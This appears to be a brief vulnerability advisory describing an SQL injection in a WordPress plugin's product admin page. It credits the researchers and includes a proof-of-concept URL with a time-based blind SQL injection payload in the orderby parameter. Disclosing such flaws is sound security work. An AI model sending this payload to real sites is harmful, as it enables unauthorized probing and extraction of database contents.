The plugin does not properly validate and sanitise the orderby parameter before using it in a SQL statement via the Manage Products admin page, leading to an SQL Injection.
https://example.com/wp-admin/admin.php?page=fmwes_products&orderby=id+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ)
Original researchers: Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)
Submitter: Daniel Krohmer
Verified: Yes
2022-05-11
2022-05-12
2022-05-13